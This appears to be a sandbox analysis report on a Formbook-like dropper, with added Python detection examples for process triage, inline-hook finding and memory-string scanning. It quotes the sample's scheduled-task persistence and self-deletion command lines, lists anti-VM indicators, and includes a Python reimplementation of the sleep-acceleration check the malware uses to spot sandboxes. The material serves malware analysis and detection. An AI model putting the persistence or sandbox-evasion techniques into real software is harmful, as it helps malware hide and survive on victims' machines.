            Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.691413999.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO_210223.exe, 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, ipconfig.exe, 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: PO_210223.exe, ipconfig.exe
            Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.691413999.0000000005A00000.00000002.00000001.sdmp

            Data Obfuscation:

            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Unpacked PE file: 0.2.PO_210223.exe.890000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Unpacked PE file: 0.2.PO_210223.exe.890000.0.unpack
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 0_2_0089423E push ebp; ret
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 0_2_00893835 push cs; iretd
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 0_2_00894043 push edi; ret
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 0_2_00897272 push edx; iretd
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 0_2_01286A7C push edi; iretd
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 0_2_01286A72 push edi; iretd
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_00409BAC push ebx; retf
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0041DD1B push eax; ret
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0041CEF2 push eax; ret
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0041CEFB push eax; ret
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0041CEA5 push eax; ret
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0041CF5C push eax; ret
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_00C320F3 pushad ; retf
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_00C34043 push edi; ret
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_00C33835 push cs; iretd
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_00C37272 push edx; iretd
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_00C3423E push ebp; ret
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_00C32E51 push CDBD7B17h; retf
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0185D0D1 push ecx; ret
            Source: C:\Windows\explorer.exe :: Code function: 10_2_04E13831 push cs; iretd
            Source: C:\Windows\explorer.exe :: Code function: 10_2_04E113E6 pushad ; ret
            Source: C:\Windows\SysWOW64\ipconfig.exe :: Code function: 13_2_034AD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\ipconfig.exe :: Code function: 13_2_009CD83B pushad ; ret
            Source: C:\Windows\SysWOW64\ipconfig.exe :: Code function: 13_2_009B9BAC push ebx; retf
            Source: C:\Windows\SysWOW64\ipconfig.exe :: Code function: 13_2_009CDE8E push eax; ret
            Source: C:\Windows\SysWOW64\ipconfig.exe :: Code function: 13_2_009CCEA5 push eax; ret
            Source: C:\Windows\SysWOW64\ipconfig.exe :: Code function: 13_2_009CCEFB push eax; ret
            Source: C:\Windows\SysWOW64\ipconfig.exe :: Code function: 13_2_009CCEF2 push eax; ret
            Source: C:\Windows\SysWOW64\ipconfig.exe :: Code function: 13_2_009CCF5C push eax; ret
            Source: initial sample :: Static PE information: section name: .text entropy: 7.247286296 (reported twice)

            Persistence and Installation Behavior:

            Uses ipconfig to lookup or modify the Windows network settings
            Source: unknown :: Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
            Source: C:\Users\user\Desktop\PO_210223.exe :: File created: C:\Users\user\AppData\Roaming\kwqifureL.exe

            Boot Survival:

            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: unknown :: Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp'
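            The process tree in this report has three detection-worthy links: schtasks.exe creating a task from an XML file in a Temp directory (the Sigma rule the report cites), PO_210223.exe starting a second copy of itself with a bare command line (the child that is later hollowed and carries the unpacked Formbook payload), and ipconfig.exe, a utility that never needs a shell, launching cmd /c del against the original file. The triage below is an added example, not Joe Sandbox or Sigma code: the events are constructed from the command lines above, the PIDs other than 6976 are made up, the field names are an assumed generic schema rather than Sysmon or a particular EDR, and the "quiet utilities" list is an illustrative assumption.

```python
"""Triage of process-creation events for the chain in this report.

Added example, not code from the report, the sample or Sigma. Events are
constructed from the report's command lines; field names are an assumed
generic schema.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


# Constructed events modelled on the report's tree (PIDs other than 6976 are made up).
EVENTS = [
    ProcEvent(4000, 1, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(6976, 4000, r"C:\Users\user\Desktop\PO_210223.exe", r'"C:\Users\user\Desktop\PO_210223.exe"'),
    ProcEvent(5000, 6976, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kwqifureL" '
              r'/XML "C:\Users\user\AppData\Local\Temp\tmp33D2.tmp"'),
    ProcEvent(5001, 5000, r"C:\Windows\System32\conhost.exe", r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(5100, 6976, r"C:\Users\user\Desktop\PO_210223.exe", r"C:\Users\user\Desktop\PO_210223.exe"),
    ProcEvent(5200, 4000, r"C:\Windows\SysWOW64\ipconfig.exe", r"C:\Windows\SysWOW64\ipconfig.exe"),
    ProcEvent(5300, 5200, r"C:\Windows\SysWOW64\cmd.exe", r'/c del "C:\Users\user\Desktop\PO_210223.exe"'),
]

# Windows utilities that have no legitimate reason to start a shell.
# Illustrative list (an assumption), not an exhaustive Formbook target list.
QUIET_UTILITIES = {"ipconfig.exe", "nslookup.exe", "whoami.exe", "netsh.exe"}

TEMP_DIR_RE = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
XML_ARG_RE = re.compile(r'/xml\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
WINDOWS_DIR = "c:\\windows\\"


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return (pid, rule, detail) tuples for every event matching one of the three rules."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        image = basename(e.image)

        # Rule 1: schtasks /Create whose task-definition XML lives in a Temp directory.
        if image == "schtasks.exe" and re.search(r"/create\b", e.cmdline, re.IGNORECASE):
            m = XML_ARG_RE.search(e.cmdline)
            xml_path = (m.group(1) or m.group(2)) if m else None
            if xml_path and TEMP_DIR_RE.search(xml_path):
                findings.append((e.pid, "scheduled_task_from_temp_xml", xml_path))

        # Rule 2: a non-system executable starts a second instance of its own image.
        # This is the hollowing setup: the parent injects the unpacked payload into
        # the suspended child (compare process 0 -> process 9 in the report).
        if parent and parent.image.lower() == e.image.lower() \
                and not e.image.lower().startswith(WINDOWS_DIR):
            findings.append((e.pid, "self_spawn_hollowing_candidate", e.image))

        # Rule 3: a quiet utility spawns cmd.exe to delete a file (the injected
        # ipconfig.exe removing the dropper once it is no longer needed).
        if parent and basename(parent.image) in QUIET_UTILITIES and image == "cmd.exe" \
                and re.search(r"/c\s+del\b", e.cmdline, re.IGNORECASE):
            findings.append((e.pid, "utility_spawns_cmd_del", f"{basename(parent.image)} -> {e.cmdline}"))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in triage(EVENTS):
        print(f"pid {pid}: {rule}: {detail}")
```

Rule 2 excludes images under C:\Windows because conhost.exe, svchost.exe and similar system binaries legitimately start copies of themselves; a user-profile or Desktop executable doing so with no arguments is the pattern worth a look. Note that the logged image path is the SysWOW64 redirect of the System32 path in the command line, so matching on the image name rather than the full path keeps the rules working for 32-bit processes on 64-bit Windows.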

            Hooking and other Techniques for Hiding and Protection:

            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exe :: User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE6
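            The sandbox detects the hook by noticing that the first bytes of PeekMessageA in explorer.exe no longer match the clean module. The replaced bytes shown here do not start with a classic E9 trampoline, which is why a practical check compares live prologues against a clean copy of the DLL instead of pattern-matching on known stub shapes alone, and then classifies whatever it finds. The following is an added example of that comparison, not code from the report or the sample: addresses, module ranges, prologue bytes and the hook target are constructed, and on a real host the clean bytes would come from the DLL on disk (mapped and relocated) and the live bytes from the target process.

```python
"""Prologue comparison to find user-mode inline hooks.

Added example, not code from the report or the sample. All addresses, module
ranges, prologue bytes and the hook target below are constructed.
"""

USER32_BASE = 0x7FF8_1000_0000
MODULES = {                                   # constructed: module name -> [start, end)
    "user32.dll": (USER32_BASE, USER32_BASE + 0x20_0000),
    "ntdll.dll": (0x7FF8_2000_0000, 0x7FF8_2020_0000),
}
PEEK_VA = USER32_BASE + 0x23F10               # constructed export addresses
GETMSG_VA = USER32_BASE + 0x24A20
HOOK_TARGET = 0x7FF8_0A00_0000                # constructed: private memory, inside no module

# mov [rsp+8],rbx ; push rdi ; sub rsp,20h  (a typical x64 prologue, constructed)
CLEAN_PROLOGUE = bytes.fromhex("48895c2408574883ec20")


def jmp_rel32(src_va: int, dst_va: int) -> bytes:
    """Encode E9 <rel32>; rel32 is relative to the end of the 5-byte instruction."""
    return b"\xe9" + (dst_va - (src_va + 5)).to_bytes(4, "little", signed=True)


BASELINE = {"PeekMessageA": (PEEK_VA, CLEAN_PROLOGUE), "GetMessageA": (GETMSG_VA, CLEAN_PROLOGUE)}
LIVE = {
    "PeekMessageA": (PEEK_VA, jmp_rel32(PEEK_VA, HOOK_TARGET) + CLEAN_PROLOGUE[5:]),  # hooked
    "GetMessageA": (GETMSG_VA, CLEAN_PROLOGUE),                                       # untouched
}


def classify_stub(code: bytes) -> str:
    """Name the common trampoline shapes; anything else is reported but not decoded."""
    if code[:1] == b"\xe9":
        return "jmp rel32"
    if code[:2] == b"\xff\x25":
        return "jmp [rip+disp32]"
    if code[:1] == b"\x68" and code[5:6] == b"\xc3":
        return "push imm32; ret"
    if code[:2] == b"\x48\xb8" and code[10:12] == b"\xff\xe0":
        return "mov rax, imm64; jmp rax"
    return "unclassified"


def stub_target(va: int, code: bytes):
    """Decode where the trampoline lands, or None when that needs another memory read."""
    kind = classify_stub(code)
    if kind == "jmp rel32":
        return (va + 5 + int.from_bytes(code[1:5], "little", signed=True)) & 0xFFFF_FFFF_FFFF_FFFF
    if kind == "push imm32; ret":
        return int.from_bytes(code[1:5], "little")
    if kind == "mov rax, imm64; jmp rax":
        return int.from_bytes(code[2:10], "little")
    return None   # jmp [rip+disp32] jumps through a pointer slot that would have to be read


def module_for(addr: int, modules: dict):
    for name, (start, end) in modules.items():
        if start <= addr < end:
            return name
    return None


def find_inline_hooks(baseline: dict, live: dict, modules: dict):
    """Compare prologues; one record per modified export, with the decoded trampoline
    target and the module that owns it (None = unbacked memory, the strongest sign
    that injected code, not a legitimate patch, is behind the hook)."""
    findings = []
    for name, (va, clean) in baseline.items():
        current = live[name][1]
        n = min(len(clean), len(current))
        if clean[:n] == current[:n]:
            continue
        target = stub_target(va, current)
        findings.append({
            "function": name,
            "stub": classify_stub(current),
            "target": target,
            "target_module": module_for(target, modules) if target is not None else None,
        })
    return findings


if __name__ == "__main__":
    for hook in find_inline_hooks(BASELINE, LIVE, MODULES):
        print(hook)
```

A hook whose target resolves into a loaded module (an EDR or a compatibility shim) deserves a lower priority than one that lands in memory no module owns; explorer.exe in this report also carries code functions at 0x04E1xxxx, an address range that no listed module accounts for.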
            Source: C:\Users\user\Desktop\PO_210223.exe :: Process information set: NOOPENFILEERRORBOX (reported 40 times)
            Source: C:\Windows\SysWOW64\ipconfig.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM_3
            Source: Yara match :: File source: 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match :: File source: Process Memory Space: PO_210223.exe PID: 6976, type: MEMORY
            Source: Yara match :: File source: 0.2.PO_210223.exe.2cb671c.1.raw.unpack, type: UNPACKEDPE
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp :: Binary or memory string: SBIEDLL.DLL
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp :: Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\PO_210223.exe :: RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\PO_210223.exe :: RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\ipconfig.exe :: RDTSC instruction interceptor: First address: 00000000009B98E4 second address: 00000000009B98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\ipconfig.exe :: RDTSC instruction interceptor: First address: 00000000009B9B4E second address: 00000000009B9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\PO_210223.exe :: File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_00409A80 rdtsc
            Source: C:\Users\user\Desktop\PO_210223.exe :: Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\PO_210223.exe TID: 6980 :: Thread sleep time: -99516s >= -30000s
            Source: C:\Users\user\Desktop\PO_210223.exe TID: 4632 :: Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 6496 :: Thread sleep time: -58000s >= -30000s
            Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6736 :: Thread sleep time: -50000s >= -30000s
            Source: C:\Windows\System32\conhost.exe :: Last function: Thread delayed
            Source: C:\Windows\explorer.exe :: Last function: Thread delayed (reported twice)
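            Two things in the timing rows above are worth decoding. The RDTSC pairs (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc) and the long sleeps are both ways for the payload to tell whether it runs under instrumentation: an emulated or trapped RDTSC costs far more cycles than native, and a sandbox that patches sleep calls returns from them much earlier than an independent clock says it should. The figure 922337203685477 is exactly INT64_MAX // 10000, the largest relative timeout NtDelayExecution accepts in 100 ns units, so that thread parks indefinitely unless the sandbox skips the wait. The following is an added example, not code from the sample or from Joe Sandbox; it assumes the report prints the absolute value of the relative timeout converted to milliseconds and reproduces the sleep-side checks in Python, where the RDTSC counter itself is not available.

```python
"""Interpreting the thread-delay figures in this report and reproducing the
sleep-acceleration checks they imply.

Added example, not code from the sample or from Joe Sandbox. Assumption: the
report prints |relative NtDelayExecution timeout| in milliseconds and flags
values at or above 30000.
"""
import time

INT64_MAX = (1 << 63) - 1
HNS_PER_MS = 10_000            # NtDelayExecution counts in 100 ns units
REPORT_THRESHOLD_MS = 30_000   # the ">= -30000" figure in the report


def classify_delay(reported_ms: int) -> str:
    """Map a reported delay to what it means for the analyst."""
    ms = abs(int(reported_ms))
    # 922337203685477 == INT64_MAX // 10000: the largest relative timeout the API
    # accepts, i.e. a wait that never returns unless the sandbox patches it out.
    if ms >= INT64_MAX // HNS_PER_MS:
        return "indefinite"
    if ms >= REPORT_THRESHOLD_MS:
        return "long_sleep"
    return "short"


def sleep_looks_accelerated(requested_s: float = 0.05, tolerance: float = 0.9) -> bool:
    """The sample-side check: sleep, then compare against a monotonic clock.
    A sandbox that makes Sleep/NtDelayExecution return immediately leaves the
    measured interval far below what was requested."""
    t0 = time.monotonic()
    time.sleep(requested_s)
    return (time.monotonic() - t0) < requested_s * tolerance


def wall_clock_jumped(requested_s: float = 0.05, max_skew_s: float = 0.5) -> bool:
    """Counter-heuristic for sandboxes that fast-forward the system clock instead
    of skipping the sleep: the wall-clock and monotonic deltas should agree."""
    w0, m0 = time.time(), time.monotonic()
    time.sleep(requested_s)
    skew = (time.time() - w0) - (time.monotonic() - m0)
    return abs(skew) > max_skew_s


if __name__ == "__main__":
    for value in (922337203685477, 99516, 58000, 50000, 1500):
        print(value, classify_delay(value))
    print("sleep accelerated:", sleep_looks_accelerated())
    print("wall clock jumped:", wall_clock_jumped())
```

For the analyst the practical consequence is the one the report shows: a payload that parks a thread indefinitely, or sleeps for 99 seconds before doing anything, produces no behaviour in a short run unless the sandbox shortens sleeps, and a sandbox that shortens them is exactly what the two checks above are designed to notice.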
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp :: Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 0000000A.00000000.688633268.0000000004710000.00000004.00000001.sdmp :: Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000A.00000000.691285014.00000000058C0000.00000002.00000001.sdmp :: Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 0000000A.00000000.695692855.000000000A60E000.00000004.00000001.sdmp :: Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} (reported twice)
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp :: Binary or memory string: vmware
            Source: explorer.exe, 0000000A.00000000.691690260.0000000006650000.00000004.00000001.sdmp :: Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000A.00000000.695811785.000000000A716000.00000004.00000001.sdmp :: Binary or memory string: War&Prod_VMware_SATAa
            Source: explorer.exe, 0000000A.00000000.700408324.000000000FD5B000.00000004.00000001.sdmp :: Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000A.00000000.688633268.0000000004710000.00000004.00000001.sdmp :: Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 0000000A.00000000.691285014.00000000058C0000.00000002.00000001.sdmp :: Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 0000000A.00000000.695811785.000000000A716000.00000004.00000001.sdmp :: Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: explorer.exe, 0000000A.00000000.691285014.00000000058C0000.00000002.00000001.sdmp :: Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp :: Binary or memory string: VMware SVGA II
            Source: explorer.exe, 0000000A.00000000.695811785.000000000A716000.00000004.00000001.sdmp :: Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmp :: Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 0000000A.00000000.691285014.00000000058C0000.00000002.00000001.sdmp :: Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
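            The string hits above come from two very different places and should not be weighed the same way. The SBIEDLL.DLL, wine_get_unix_file_name, VMware SVGA II and VMware Tools strings sit in the memory of process 0, the .NET loader stage of PO_210223.exe, and are the comparison constants of its anti-analysis checks. The device paths and Hyper-V message text sit in explorer.exe, a Windows process that simply runs on a VMware guest; they describe the analysis VM, not anything the sample does. A second detail matters for anyone reproducing the scan: the loader is a .NET assembly (mscorlib.ni.dll is loaded), so its string constants live in memory as UTF-16LE and an ASCII-only scan walks straight past them. The scanner below is an added example, not code from the report or the sample; both memory regions are constructed byte strings, the region labels reuse the report's dump identifiers purely as names, and the indicator list is illustrative rather than complete.

```python
"""Scan memory regions for analysis-environment strings in 8-bit and UTF-16LE
form, and attribute hits to the process that owns the region.

Added example, not code from the report or the sample. Both regions below are
constructed byte strings; the indicator list is illustrative.
"""

INDICATORS = {
    "sandboxie": ["SBIEDLL.DLL"],
    "wine": ["wine_get_unix_file_name"],
    "vmware": ["VMware SVGA II", "VMware Tools", "Ven_NECVMWar", "VMware_SATA_CD00",
               "Ven_VMware&Prod_Virtual_disk"],
    "hyper-v": ["Hyper-V"],
}

ENCODINGS = (("ascii", "latin-1"), ("utf-16le", "utf-16-le"))


def _u16(s: str) -> bytes:
    return s.encode("utf-16-le")


# Region 1 stands in for the .NET loader's heap (process 0 in the report):
# managed strings are UTF-16LE, which is why an ASCII-only scan misses them.
SAMPLE_REGION = (b"\x00" * 16 + _u16("SBIEDLL.DLL") + b"\x00\x00"
                 + _u16("kernel32.dll.wine_get_unix_file_name") + b"\x00\x00"
                 + _u16("VMware SVGA II") + b"\x00\x00"
                 + _u16("SOFTWARE\\VMware, Inc.\\VMware Tools") + b"\x00" * 16)

# Region 2 stands in for explorer.exe (process 10): a device path and Hyper-V
# message-table text that Windows itself keeps in memory on a VMware guest.
EXPLORER_REGION = (b"\x00" * 8
                   + b"\\\\?\\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000"
                   + b"#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}" + b"\x00" * 4
                   + _u16("A Virtual Machine could not be started because Hyper-V is not installed.")
                   + b"\x00" * 8)

# (process name, region label) -> bytes; labels are the report's dump ids, used as names only
REGIONS = {
    ("PO_210223.exe", "00000000.00000002.680445109.0000000002C2D000"): SAMPLE_REGION,
    ("explorer.exe", "0000000A.00000000.688633268.0000000004710000"): EXPLORER_REGION,
}


def scan_region(blob: bytes) -> dict:
    """Return {family: [(needle, encoding, offset), ...]} for every indicator found,
    matched case-insensitively in both encodings."""
    lowered = blob.lower()   # bytes.lower() only folds ASCII letters, so UTF-16LE layout survives
    hits = {}
    for family, needles in INDICATORS.items():
        for needle in needles:
            for label, codec in ENCODINGS:
                off = lowered.find(needle.lower().encode(codec))
                if off != -1:
                    hits.setdefault(family, []).append((needle, label, off))
    return hits


def antivm_evidence(regions: dict, sample_process: str) -> dict:
    """Keep only hits from regions the sample itself owns. Strings inside
    explorer.exe or other system processes describe the analysis VM, not the
    sample's intent, and would otherwise inflate the verdict."""
    evidence = {}
    for (process, region_name), blob in regions.items():
        if process != sample_process:
            continue
        for family, found in scan_region(blob).items():
            evidence.setdefault(family, []).extend((region_name, *h) for h in found)
    return evidence


if __name__ == "__main__":
    for key, blob in REGIONS.items():
        print(key, scan_region(blob))
    print("attributable to the sample:", sorted(antivm_evidence(REGIONS, "PO_210223.exe")))
```

Run against real dumps, the same attribution rule applies to the Yara AntiVM_3 match: it fires on the sample's own regions (the 00000000.00000002 dump and the unpacked .NET blob), which is what makes it evidence, whereas the explorer.exe strings would match a naive rule on any VMware guest.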
            Source: C:\Users\user\Desktop\PO_210223.exe :: Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\PO_210223.exe :: Process queried: DebugPort
            Source: C:\Windows\SysWOW64\ipconfig.exe :: Process queried: DebugPort
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_00409A80 rdtsc
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0040ACC0 LdrLoadDll,
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0182C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0183A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_01832990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_018361A0 mov eax, dword ptr fs:[00000030h] (reported 2 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_018869A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_018851BE mov eax, dword ptr fs:[00000030h] (reported 4 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_018941E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0180B1E1 mov eax, dword ptr fs:[00000030h] (reported 3 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_01809100 mov eax, dword ptr fs:[00000030h] (reported 3 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_01824120 mov eax, dword ptr fs:[00000030h] (reported 4 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_01824120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0183513A mov eax, dword ptr fs:[00000030h] (reported 2 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0182B944 mov eax, dword ptr fs:[00000030h] (reported 2 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0180C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0180B171 mov eax, dword ptr fs:[00000030h] (reported 2 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_01809080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_01883884 mov eax, dword ptr fs:[00000030h] (reported 2 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_018320A0 mov eax, dword ptr fs:[00000030h] (reported 6 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_018490AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0183F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0183F0BF mov eax, dword ptr fs:[00000030h] (reported 2 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0189B8D0 mov eax, dword ptr fs:[00000030h] (reported 5 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0189B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_018058EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_018D4015 mov eax, dword ptr fs:[00000030h] (reported 2 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_01887016 mov eax, dword ptr fs:[00000030h] (reported 3 times)
            Source: C:\Users\user\Desktop\PO_210223.exe :: Code function: 9_2_0181B02A mov eax, dword ptr fs:[00000030h] (reported 4 times)
